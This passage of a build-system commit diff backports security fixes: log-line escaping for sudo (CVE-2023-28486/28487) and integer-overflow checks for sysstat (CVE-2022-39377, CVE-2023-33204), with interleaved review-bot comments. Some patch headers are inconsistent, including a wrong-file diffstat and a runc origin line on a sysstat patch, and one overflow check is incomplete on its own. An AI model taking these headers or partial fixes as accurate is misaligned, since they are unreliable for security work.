+ include/sudo_lbuf.h | 7 ++
+ lib/util/lbuf.c | 106 +++++++++++++++++++++++++++++++
+ lib/util/util.exp.in | 1
+ plugins/sudoers/logging.c | 145 +++++++++++--------------------------------
+ plugins/sudoers/sudoreplay.c | 44 +++++++++----
+ 10 files changed, 257 insertions(+), 132 deletions(-)
+
+--- a/doc/sudoers.man.in
++++ b/doc/sudoers.man.in
+@@ -4566,6 +4566,19 @@ can log events using either
+ syslog(3)
+ or a simple log file.
+ The log format is almost identical in both cases.
++Any control characters present in the log data are formatted in octal
++with a leading
++\(oq#\(cq
++character.
++For example, a horizontal tab is stored as
++\(oq#011\(cq
++and an embedded carriage return is stored as
++\(oq#015\(cq.
++In addition, space characters in the command path are stored as
++\(oq#040\(cq.
++Literal single quotes and backslash characters
++(\(oq\e\(cq)
++in command line arguments are escaped with a backslash.
+ .SS "Accepted command log entries"
+ Commands that sudo runs are logged using the following format (split
+ into multiple lines for readability):
+@@ -4646,7 +4659,7 @@ A list of environment variables specifie
+ if specified.
+ .TP 14n
+ command
+-The actual command that was executed.
++The actual command that was executed, including any command line arguments.
+ .PP
+ Messages are logged using the locale specified by
+ \fIsudoers_locale\fR,
+@@ -4882,17 +4895,21 @@ with a few important differences:
+ 1.\&
+ The
+ \fIprogname\fR
+-and
+-\fIhostname\fR
+-fields are not present.
++field is not present.
+ .TP 5n
+ 2.\&
+-If the
+-\fIlog_year\fR
+-option is enabled,
+-the date will also include the year.
++The
++\fIhostname\fR
++is only logged if the
++\fIlog_host\fR
++option is enabled.
+ .TP 5n
+ 3.\&
++The date does not include the year unless the
++\fIlog_year\fR
++option is enabled.
++.TP 5n
++4.\&
+ Lines that are longer than
+ \fIloglinelen\fR
+ characters (80 by default) are word-wrapped and continued on the
+--- a/doc/sudoers.mdoc.in
++++ b/doc/sudoers.mdoc.in
+@@ -4261,6 +4261,19 @@ can log events using either
+ .Xr syslog 3
+ or a simple log file.
+ The log format is almost identical in both cases.
++Any control characters present in the log data are formatted in octal
++with a leading
++.Ql #
++character.
++For example, a horizontal tab is stored as
++.Ql #011
++and an embedded carriage return is stored as
++.Ql #015 .
++In addition, space characters in the command path are stored as
++.Ql #040 .
++Literal single quotes and backslash characters
++.Pq Ql \e
++in command line arguments are escaped with a backslash.
+ .Ss Accepted command log entries
+ Commands that sudo runs are logged using the following format (split
+ into multiple lines for readability):
+@@ -4328,7 +4341,7 @@ option is enabled.
+ A list of environment variables specified on the command line,
+ if specified.
+ .It command
+-The actual command that was executed.
++The actual command that was executed, including any command line arguments.
+ .El
+ .Pp
+ Messages are logged using the locale specified by
+@@ -4550,14 +4563,17 @@ with a few important differences:
+ .It
+ The
+ .Em progname
+-and
++field is not present.
++.It
++The
+ .Em hostname
+-fields are not present.
++is only logged if the
++.Em log_host
++option is enabled.
+ .It
+-If the
++The date does not include the year unless the
+ .Em log_year
+-option is enabled,
+-the date will also include the year.
++option is enabled.
+ .It
+ Lines that are longer than
+ .Em loglinelen
+--- a/doc/sudoreplay.man.in
++++ b/doc/sudoreplay.man.in
+@@ -149,6 +149,15 @@ In this mode,
+ will list available sessions in a format similar to the
+ \fBsudo\fR
+ log file format, sorted by file name (or sequence number).
++Any control characters present in the log data are formated in octal
++with a leading
++\(oq#\(cq
++character.
++For example, a horizontal tab is displayed as
++\(oq#011\(cq
++and an embedded carriage return is displayed as
++\(oq#015\(cq.
++.sp
+ If a
+ \fIsearch expression\fR
+ is specified, it will be used to restrict the IDs that are displayed.
+--- a/doc/sudoreplay.mdoc.in
++++ b/doc/sudoreplay.mdoc.in
+@@ -142,6 +142,16 @@ In this mode,
+ will list available sessions in a format similar to the
+ .Nm sudo
+ log file format, sorted by file name (or sequence number).
++Any control characters present in the log data are formatted in octal
++with a leading
++.Ql #
++character.
++For example, a horizontal tab is displayed as
++.Ql #011
++and an embedded carriage return is displayed as
++.Ql #015 .
++Space characters in the command name and arguments are also formatted in octal.
++.Pp
+ If a
+ .Ar search expression
+ is specified, it will be used to restrict the IDs that are displayed.
+--- a/include/sudo_compat.h
++++ b/include/sudo_compat.h
+@@ -79,6 +79,12 @@
+ # endif
+ #endif
+
++#ifdef HAVE_FALLTHROUGH_ATTRIBUTE
++# define FALLTHROUGH __attribute__((__fallthrough__))
++#else
++# define FALLTHROUGH do { } while (0)
++#endif
++
+ /*
+ * Given the pointer x to the member m of the struct s, return
+ * a pointer to the containing structure.
+--- a/include/sudo_lbuf.h
++++ b/include/sudo_lbuf.h
+@@ -36,9 +36,15 @@ struct sudo_lbuf {
+
+ typedef int (*sudo_lbuf_output_t)(const char *);
+
++/* Flags for sudo_lbuf_append_esc() */
++#define LBUF_ESC_CNTRL 0x01
++#define LBUF_ESC_BLANK 0x02
++#define LBUF_ESC_QUOTE 0x04
++
+ __dso_public void sudo_lbuf_init_v1(struct sudo_lbuf *lbuf, sudo_lbuf_output_t output, int indent, const char *continuation, int cols);
+ __dso_public void sudo_lbuf_destroy_v1(struct sudo_lbuf *lbuf);
+ __dso_public bool sudo_lbuf_append_v1(struct sudo_lbuf *lbuf, const char *fmt, ...) __printflike(2, 3);
++__dso_public bool sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...) __printflike(3, 4);
+ __dso_public bool sudo_lbuf_append_quoted_v1(struct sudo_lbuf *lbuf, const char *set, const char *fmt, ...) __printflike(3, 4);
+ __dso_public void sudo_lbuf_print_v1(struct sudo_lbuf *lbuf);
+ __dso_public bool sudo_lbuf_error_v1(struct sudo_lbuf *lbuf);
+@@ -47,6 +53,7 @@ __dso_public void sudo_lbuf_clearerr_v1(
+ #define sudo_lbuf_init(_a, _b, _c, _d, _e) sudo_lbuf_init_v1((_a), (_b), (_c), (_d), (_e))
+ #define sudo_lbuf_destroy(_a) sudo_lbuf_destroy_v1((_a))
+ #define sudo_lbuf_append sudo_lbuf_append_v1
++#define sudo_lbuf_append_esc sudo_lbuf_append_esc_v1
+ #define sudo_lbuf_append_quoted sudo_lbuf_append_quoted_v1
+ #define sudo_lbuf_print(_a) sudo_lbuf_print_v1((_a))
+ #define sudo_lbuf_error(_a) sudo_lbuf_error_v1((_a))
+--- a/lib/util/lbuf.c
++++ b/lib/util/lbuf.c
+@@ -93,6 +93,112 @@ sudo_lbuf_expand(struct sudo_lbuf *lbuf,
+ }
+
+ /*
++ * Escape a character in octal form (#0n) and store it as a string
++ * in buf, which must have at least 6 bytes available.
++ * Returns the length of buf, not counting the terminating NUL byte.
++ */
++static int
++escape(unsigned char ch, char *buf)
++{
++ const int len = ch < 0100 ? (ch < 010 ? 3 : 4) : 5;
++
++ /* Work backwards from the least significant digit to most significant. */
++ switch (len) {
++ case 5:
++ buf[4] = (ch & 7) + '0';
++ ch >>= 3;
++ FALLTHROUGH;
++ case 4:
++ buf[3] = (ch & 7) + '0';
++ ch >>= 3;
++ FALLTHROUGH;
++ case 3:
++ buf[2] = (ch & 7) + '0';
++ buf[1] = '0';
++ buf[0] = '#';
++ break;
++ }
++ buf[len] = '\0';
++
++ return len;
++}
++
++/*
++ * Parse the format and append strings, only %s and %% escapes are supported.
++ * Any non-printable characters are escaped in octal as #0nn.
++ */
++bool
++sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...)
++{
++ unsigned int saved_len = lbuf->len;
++ bool ret = false;
++ const char *s;
++ va_list ap;
++ debug_decl(sudo_lbuf_append_esc, SUDO_DEBUG_UTIL);
++
++ if (sudo_lbuf_error(lbuf))
++ debug_return_bool(false);
++
++#define should_escape(ch) \
++ ((ISSET(flags, LBUF_ESC_CNTRL) && iscntrl((unsigned char)ch)) || \
++ (ISSET(flags, LBUF_ESC_BLANK) && isblank((unsigned char)ch)))
++#define should_quote(ch) \
++ (ISSET(flags, LBUF_ESC_QUOTE) && (ch == '\'' || ch == '\\'))
++
++ va_start(ap, fmt);
++ while (*fmt != '\0') {
++ if (fmt[0] == '%' && fmt[1] == 's') {
++ if ((s = va_arg(ap, char *)) == NULL)
++ s = "(NULL)";
++ while (*s != '\0') {
++ if (should_escape(*s)) {
++ if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1))
++ goto done;
++ lbuf->len += escape(*s++, lbuf->buf + lbuf->len);
++ continue;
++ }
++ if (should_quote(*s)) {
++ if (!sudo_lbuf_expand(lbuf, 2))
++ goto done;
++ lbuf->buf[lbuf->len++] = '\\';
++ lbuf->buf[lbuf->len++] = *s++;
++ continue;
++ }
++ if (!sudo_lbuf_expand(lbuf, 1))
++ goto done;
++ lbuf->buf[lbuf->len++] = *s++;
++ }
++ fmt += 2;
++ continue;
++ }
++ if (should_escape(*fmt)) {
++ if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1))
++ goto done;
++ if (*fmt == '\'') {
++ lbuf->buf[lbuf->len++] = '\\';
++ lbuf->buf[lbuf->len++] = *fmt++;
++ } else {
++ lbuf->len += escape(*fmt++, lbuf->buf + lbuf->len);
++ }
++ continue;
++ }
++ if (!sudo_lbuf_expand(lbuf, 1))
++ goto done;
++ lbuf->buf[lbuf->len++] = *fmt++;
++ }
++ ret = true;
++
++done:
++ if (!ret)
++ lbuf->len = saved_len;
++ if (lbuf->size != 0)
++ lbuf->buf[lbuf->len] = '\0';
++ va_end(ap);
++
++ debug_return_bool(ret);
++}
++
++/*
+ * Parse the format and append strings, only %s and %% escapes are supported.
+ * Any characters in set are quoted with a backslash.
+ */
+--- a/lib/util/util.exp.in
++++ b/lib/util/util.exp.in
+@@ -79,6 +79,7 @@ sudo_gethostname_v1
+ sudo_gettime_awake_v1
+ sudo_gettime_mono_v1
+ sudo_gettime_real_v1
++sudo_lbuf_append_esc_v1
+ sudo_lbuf_append_quoted_v1
+ sudo_lbuf_append_v1
+ sudo_lbuf_clearerr_v1
+--- a/plugins/sudoers/logging.c
++++ b/plugins/sudoers/logging.c
+@@ -58,6 +58,7 @@
+ #include <syslog.h>
+
+ #include "sudoers.h"
++#include "sudo_lbuf.h"
+
+ #ifndef HAVE_GETADDRINFO
+ # include "compat/getaddrinfo.h"
+@@ -940,14 +941,6 @@ should_mail(int status)
+ (def_mail_no_perms && !ISSET(status, VALIDATE_SUCCESS)));
+ }
+
+-#define LL_TTY_STR "TTY="
+-#define LL_CWD_STR "PWD=" /* XXX - should be CWD= */
+-#define LL_USER_STR "USER="
+-#define LL_GROUP_STR "GROUP="
+-#define LL_ENV_STR "ENV="
+-#define LL_CMND_STR "COMMAND="
+-#define LL_TSID_STR "TSID="
+-
+ #define IS_SESSID(s) ( \
+ isalnum((unsigned char)(s)[0]) && isalnum((unsigned char)(s)[1]) && \
+ (s)[2] == '/' && \
+@@ -962,14 +955,16 @@ should_mail(int status)
+ static char *
+ new_logline(const char *message, const char *errstr)
+ {
+- char *line = NULL, *evstr = NULL;
+ #ifndef SUDOERS_NO_SEQ
+ char sessid[7];
+ #endif
+ const char *tsid = NULL;
+- size_t len = 0;
++ struct sudo_lbuf lbuf;
++ int i;
+ debug_decl(new_logline, SUDOERS_DEBUG_LOGGING)
+
++ sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0);
++
+ #ifndef SUDOERS_NO_SEQ
+ /* A TSID may be a sudoers-style session ID or a free-form string. */
+ if (sudo_user.iolog_file != NULL) {
+@@ -989,119 +984,55 @@ new_logline(const char *message, const c
+ #endif
+
+ /*
+- * Compute line length
++ * Format the log line as an lbuf, escaping control characters in
++ * octal form (#0nn). Error checking (ENOMEM) is done at the end.
+ */
+- if (message != NULL)
+- len += strlen(message) + 3;
+- if (errstr != NULL)
+- len += strlen(errstr) + 3;
+- len += sizeof(LL_TTY_STR) + 2 + strlen(user_tty);
+- len += sizeof(LL_CWD_STR) + 2 + strlen(user_cwd);
+- if (runas_pw != NULL)
+- len += sizeof(LL_USER_STR) + 2 + strlen(runas_pw->pw_name);
+- if (runas_gr != NULL)
+- len += sizeof(LL_GROUP_STR) + 2 + strlen(runas_gr->gr_name);
+- if (tsid != NULL)
+- len += sizeof(LL_TSID_STR) + 2 + strlen(tsid);
+- if (sudo_user.env_vars != NULL) {
+- size_t evlen = 0;
+- char * const *ep;
+-
+- for (ep = sudo_user.env_vars; *ep != NULL; ep++)
+- evlen += strlen(*ep) + 1;
+- if (evlen != 0) {
+- if ((evstr = malloc(evlen)) == NULL)
+- goto oom;
+- evstr[0] = '\0';
+- for (ep = sudo_user.env_vars; *ep != NULL; ep++) {
+- strlcat(evstr, *ep, evlen);
+- strlcat(evstr, " ", evlen); /* NOTE: last one will fail */
+- }
+- len += sizeof(LL_ENV_STR) + 2 + evlen;
+- }
+- }
+- if (user_cmnd != NULL) {
+- /* Note: we log "sudo -l command arg ..." as "list command arg ..." */
+- len += sizeof(LL_CMND_STR) - 1 + strlen(user_cmnd);
+- if (ISSET(sudo_mode, MODE_CHECK))
+- len += sizeof("list ") - 1;
+- if (user_args != NULL)
+- len += strlen(user_args) + 1;
+- }
+-
+- /*
+- * Allocate and build up the line.
+- */
+- if ((line = malloc(++len)) == NULL)
+- goto oom;
+- line[0] = '\0';
+
+ if (message != NULL) {
+- if (strlcat(line, message, len) >= len ||
+- strlcat(line, errstr ? " : " : " ; ", len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s%s", message,
++ errstr ? " : " : " ; ");
+ }
+ if (errstr != NULL) {
+- if (strlcat(line, errstr, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
+- }
+- if (strlcat(line, LL_TTY_STR, len) >= len ||
+- strlcat(line, user_tty, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
+- if (strlcat(line, LL_CWD_STR, len) >= len ||
+- strlcat(line, user_cwd, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s ; ", errstr);
++ }
++ if (user_tty != NULL) {
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ", user_tty);
++ }
++ if (user_cwd != NULL) {
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "PWD=%s ; ", user_cwd);
++ }
+ if (runas_pw != NULL) {
+- if (strlcat(line, LL_USER_STR, len) >= len ||
+- strlcat(line, runas_pw->pw_name, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "USER=%s ; ",
++ runas_pw->pw_name);
+ }
+ if (runas_gr != NULL) {
+- if (strlcat(line, LL_GROUP_STR, len) >= len ||
+- strlcat(line, runas_gr->gr_name, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ",
++ runas_gr->gr_name);
+ }
+ if (tsid != NULL) {
+- if (strlcat(line, LL_TSID_STR, len) >= len ||
+- strlcat(line, tsid, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
+- }
+- if (evstr != NULL) {
+- if (strlcat(line, LL_ENV_STR, len) >= len ||
+- strlcat(line, evstr, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
+- free(evstr);
+- evstr = NULL;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", tsid);
++ }
++ if (sudo_user.env_vars != NULL) {
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "ENV=%s", sudo_user.env_vars[0]);
++ for (i = 1; sudo_user.env_vars[i] != NULL; i++) {
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s",
++ sudo_user.env_vars[i]);
++ }
+ }
+ if (user_cmnd != NULL) {
+- if (strlcat(line, LL_CMND_STR, len) >= len)
+- goto toobig;
+- if (ISSET(sudo_mode, MODE_CHECK) && strlcat(line, "list ", len) >= len)
+- goto toobig;
+- if (strlcat(line, user_cmnd, len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK,
++ "COMMAND=%s", user_cmnd);
+ if (user_args != NULL) {
+- if (strlcat(line, " ", len) >= len ||
+- strlcat(line, user_args, len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf,
++ LBUF_ESC_CNTRL|LBUF_ESC_QUOTE,
++ " %s", user_args);
+ }
+ }
+
+- debug_return_str(line);
+-oom:
+- free(evstr);
++ if (!sudo_lbuf_error(&lbuf))
++ debug_return_str(lbuf.buf);
++
++ sudo_lbuf_destroy(&lbuf);
+ sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory"));
+ debug_return_str(NULL);
+-toobig:
+- free(evstr);
+- free(line);
+- sudo_warnx(U_("internal error, %s overflow"), __func__);
+- debug_return_str(NULL);
+ }
+--- a/plugins/sudoers/sudoreplay.c
++++ b/plugins/sudoers/sudoreplay.c
+@@ -71,6 +71,7 @@
+ #include "sudo_conf.h"
+ #include "sudo_debug.h"
+ #include "sudo_event.h"
++#include "sudo_lbuf.h"
+ #include "sudo_util.h"
+
+ #ifdef HAVE_GETOPT_LONG
+@@ -1353,7 +1354,8 @@ match_expr(struct search_node_list *head
+ }
+
+ static int
+-list_session(char *logfile, regex_t *re, const char *user, const char *tty)
++list_session(struct sudo_lbuf *lbuf, char *logfile, regex_t *re,
++ const char *user, const char *tty)
+ {
+ char idbuf[7], *idstr, *cp;
+ const char *timestr;
+@@ -1386,16 +1388,32 @@ list_session(char *logfile, regex_t *re,
+ }
+ /* XXX - print rows + cols? */
+ timestr = get_timestr(li->tstamp, 1);
+- printf("%s : %s : TTY=%s ; CWD=%s ; USER=%s ; ",
+- timestr ? timestr : "invalid date",
+- li->user, li->tty, li->cwd, li->runas_user);
+- if (li->runas_group)
+- printf("GROUP=%s ; ", li->runas_group);
+- printf("TSID=%s ; COMMAND=%s\n", idstr, li->cmd);
+-
+- ret = 0;
+-
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "%s : %s : ",
++ timestr ? timestr : "invalid date", li->user);
++ if (li->tty != NULL) {
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ",
++ li->tty);
++ }
++ if (li->cwd != NULL) {
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "CWD=%s ; ",
++ li->cwd);
++ }
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "USER=%s ; ", li->runas_user);
++ if (li->runas_group != NULL) {
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ",
++ li->runas_group);
++ }
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", idstr);
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "COMMAND=%s",
++ li->cmd);
++
++ if (!sudo_lbuf_error(lbuf)) {
++ puts(lbuf->buf);
++ ret = 0;
++ }
+ done:
++ lbuf->error = 0;
++ lbuf->len = 0;
+ free_log_info(li);
+ debug_return_int(ret);
+ }
+@@ -1415,6 +1433,7 @@ find_sessions(const char *dir, regex_t *
+ DIR *d;
+ struct dirent *dp;
+ struct stat sb;
++ struct sudo_lbuf lbuf;
+ size_t sdlen, sessions_len = 0, sessions_size = 0;
+ unsigned int i;
+ int len;
+@@ -1426,6 +1445,8 @@ find_sessions(const char *dir, regex_t *
+ #endif
+ debug_decl(find_sessions, SUDO_DEBUG_UTIL)
+
++ sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0);
++
+ d = opendir(dir);
+ if (d == NULL)
+ sudo_fatal(U_("unable to open %s"), dir);
+@@ -1485,7 +1506,7 @@ find_sessions(const char *dir, regex_t *
+
+ /* Check for dir with a log file. */
+ if (lstat(pathbuf, &sb) == 0 && S_ISREG(sb.st_mode)) {
+- list_session(pathbuf, re, user, tty);
++ list_session(&lbuf, pathbuf, re, user, tty);
+ } else {
+ /* Strip off "/log" and recurse if a dir. */
+ pathbuf[sdlen + len - 4] = '\0';
+@@ -1496,6 +1517,7 @@ find_sessions(const char *dir, regex_t *
+ }
+ free(sessions);
+ }
++ sudo_lbuf_destroy(&lbuf);
+
+ debug_return_int(0);
+ }
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch
new file mode 100644
index 0000000000..d021873b70
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch
@@ -0,0 +1,26 @@
+Backport of:
+
+From 12648b4e0a8cf486480442efd52f0e0b6cab6e8b Mon Sep 17 00:00:00 2001
+From: "Todd C. Miller" <Todd.Miller@sudo.ws>
+Date: Mon, 13 Mar 2023 08:04:32 -0600
+Subject: [PATCH] Add missing " ; " separator between environment variables and
+ command. This is a regression introduced in sudo 1.9.13. GitHub issue #254.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/sudo-project/sudo/commit/12648b4e0a8cf486480442efd52f0e0b6cab6e8b]
+CVE: CVE-2023-28486 CVE-2023-28487
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/eventlog/eventlog.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+--- a/plugins/sudoers/logging.c
++++ b/plugins/sudoers/logging.c
+@@ -1018,6 +1018,7 @@ new_logline(const char *message, const c
+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s",
+ sudo_user.env_vars[i]);
+ }
++ sudo_lbuf_append(&lbuf, " ; ");
+ }
+ if (user_cmnd != NULL) {
+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK,
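Review bot: The diffstat in this patch header still names `lib/eventlog/eventlog.c`, but the hunk applies to `plugins/sudoers/logging.c`, and the subject speaks of a regression in sudo 1.9.13 while this recipe builds 1.8.32. The header should record that the change was retargeted for the backport, for example `Backport note: applied to plugins/sudoers/logging.c; restores the " ; " separator dropped by CVE-2023-28486_CVE-2023-28487-1.patch`. Separately, the block this line is added to formats `sudo_user.env_vars[0]` and starts its loop at index 1 after checking only that the array pointer is non-NULL; whether an empty array can reach new_logline is not visible here, so that is worth confirming. new_logline starts and ends outside the hunk.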
diff --git a/meta/recipes-extended/sudo/sudo_1.8.31.bb b/meta/recipes-extended/sudo/sudo_1.8.32.bb
index 39d8817c32..e35bbfa789 100644
--- a/meta/recipes-extended/sudo/sudo_1.8.31.bb
+++ b/meta/recipes-extended/sudo/sudo_1.8.32.bb
@@ -3,12 +3,17 @@ require sudo.inc
SRC_URI = "https://www.sudo.ws/dist/sudo-${PV}.tar.gz \
${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \
file://0001-Include-sys-types.h-for-id_t-definition.patch \
+ file://0001-Fix-includes-when-building-with-musl.patch \
+ file://CVE-2022-43995.patch \
+ file://CVE-2023-22809.patch \
+ file://CVE-2023-28486_CVE-2023-28487-1.patch \
+ file://CVE-2023-28486_CVE-2023-28487-2.patch \
"
PAM_SRC_URI = "file://sudo.pam"
-SRC_URI[md5sum] = "ce17ff6e72a70f8d5dabba8abf3cd2de"
-SRC_URI[sha256sum] = "7ea8d97a3cee4c844e0887ea7a1bd80eb54cc98fd77966776cb1a80653ad454f"
+SRC_URI[md5sum] = "a7318202ba391079a0e32933f0fb8bd6"
+SRC_URI[sha256sum] = "5ce3c18c5efbecd5437a0945f314f1822423eaf9a2d7eb7ecf80857bc32246c5"
DEPENDS += " virtual/crypt ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'libpam', '', d)}"
RDEPENDS_${PN} += " ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'pam-plugin-limits pam-plugin-keyinit', '', d)}"
diff --git a/meta/recipes-extended/sysklogd/sysklogd.inc b/meta/recipes-extended/sysklogd/sysklogd.inc
index 8899daa1b0..e45b256bbe 100644
--- a/meta/recipes-extended/sysklogd/sysklogd.inc
+++ b/meta/recipes-extended/sysklogd/sysklogd.inc
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=5b4be4b2549338526758ef479c040943 \
inherit update-rc.d update-alternatives systemd autotools
-SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1 \
+SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1;protocol=https \
file://sysklogd \
file://0001-fix-one-rarely-reproduced-parallel-build-problem.patch \
"
diff --git a/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch b/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch
new file mode 100644
index 0000000000..972cc8938b
--- /dev/null
+++ b/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch
@@ -0,0 +1,92 @@
+From 9c4eaf150662ad40607923389d4519bc83b93540 Mon Sep 17 00:00:00 2001
+From: Sebastien <seb@fedora-2.home>
+Date: Sat, 15 Oct 2022 14:24:22 +0200
+Subject: [PATCH] Fix size_t overflow in sa_common.c (GHSL-2022-074)
+
+allocate_structures function located in sa_common.c insufficiently
+checks bounds before arithmetic multiplication allowing for an
+overflow in the size allocated for the buffer representing system
+activities.
+
+This patch checks that the post-multiplied value is not greater than
+UINT_MAX.
+
+Signed-off-by: Sebastien <seb@fedora-2.home>
+
+Upstream-Status: Backport [https://github.com/sysstat/sysstat/commit/9c4eaf150662ad40607923389d4519bc83b93540]
+CVE : CVE-2022-39377
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ common.c | 25 +++++++++++++++++++++++++
+ common.h | 2 ++
+ sa_common.c | 6 ++++++
+ 3 files changed, 33 insertions(+)
+
+diff --git a/common.c b/common.c
+index ddfe75d..28d475e 100644
+--- a/common.c
++++ b/common.c
+@@ -1528,4 +1528,29 @@ int parse_values(char *strargv, unsigned char bitmap[], int max_val, const char
+
+ return 0;
+ }
++
++/*
++ ***************************************************************************
++ * Check if the multiplication of the 3 values may be greater than UINT_MAX.
++ *
++ * IN:
++ * @val1 First value.
++ * @val2 Second value.
++ * @val3 Third value.
++ ***************************************************************************
++ */
++void check_overflow(size_t val1, size_t val2, size_t val3)
++{
++ if ((unsigned long long) val1 *
++ (unsigned long long) val2 *
++ (unsigned long long) val3 > UINT_MAX) {
++#ifdef DEBUG
++ fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n",
++ __FUNCTION__,
++ (unsigned long long) val1 * (unsigned long long) val2 * (unsigned long long) val3);
++#endif
++ exit(4);
++ }
++}
++
+ #endif /* SOURCE_SADC undefined */
+diff --git a/common.h b/common.h
+index 86905ba..75f837a 100644
+--- a/common.h
++++ b/common.h
+@@ -249,6 +249,8 @@ int get_wwnid_from_pretty
+ (char *, unsigned long long *, unsigned int *);
+
+ #ifndef SOURCE_SADC
++void check_overflow
++ (size_t, size_t, size_t);
+ int count_bits
+ (void *, int);
+ int count_csvalues
+diff --git a/sa_common.c b/sa_common.c
+index 8a03099..ff90c1f 100644
+--- a/sa_common.c
++++ b/sa_common.c
+@@ -452,7 +452,13 @@ void allocate_structures(struct activity *act[])
+ int i, j;
+
+ for (i = 0; i < NR_ACT; i++) {
++
+ if (act[i]->nr_ini > 0) {
++
++ /* Look for a possible overflow */
++ check_overflow((size_t) act[i]->msize, (size_t) act[i]->nr_ini,
++ (size_t) act[i]->nr2);
++
+ for (j = 0; j < 3; j++) {
+ SREALLOC(act[i]->buf[j], void,
+ (size_t) act[i]->msize * (size_t) act[i]->nr_ini * (size_t) act[i]->nr2);
+--
+2.25.1
+
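Review bot: check_overflow multiplies its three `size_t` arguments as `unsigned long long` before comparing with UINT_MAX, so where those types are 64 bits wide and the values are large enough the product itself can wrap and pass the test. CVE-2023-33204.patch, added to the same recipe, rewrites the comparison with divisions, so this patch is only complete when that one is applied after it. The header should say so, e.g. `Note: incomplete on its own, must be followed by CVE-2023-33204.patch`. The types of `msize`, `nr_ini` and `nr2` behind the casts in allocate_structures are not visible in the hunk.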
diff --git a/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch b/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch
new file mode 100644
index 0000000000..9a27945a8b
--- /dev/null
+++ b/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch
@@ -0,0 +1,46 @@
+Origin: https://github.com/opencontainers/runc/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-02-18
+
+From 954ff2e2673cef48f0ed44668c466eab041db387 Mon Sep 17 00:00:00 2001
+From: Pavel Kopylov <pkopylov@cloudlinux.com>
+Date: Wed, 17 May 2023 11:33:45 +0200
+Subject: [PATCH] Fix an overflow which is still possible for some values.
+
+CVE: CVE-2023-33204
+Upstream-Status: Backport [ upstream: https://github.com/sysstat/sysstat/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0
+debian: http://security.debian.org/debian-security/pool/updates/main/s/sysstat/sysstat_12.0.3-2+deb10u2.debian.tar.xz ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+---
+ common.c | 7 +++++--
+ 1 file changed, 5 insertions(+), 2 deletions(-)
+
+Index: sysstat-12.0.3/common.c
+===================================================================
+--- sysstat-12.0.3.orig/common.c
++++ sysstat-12.0.3/common.c
+@@ -1449,15 +1449,16 @@ int parse_values(char *strargv, unsigned
+ */
+ void check_overflow(size_t val1, size_t val2, size_t val3)
+ {
+- if ((unsigned long long) val1 *
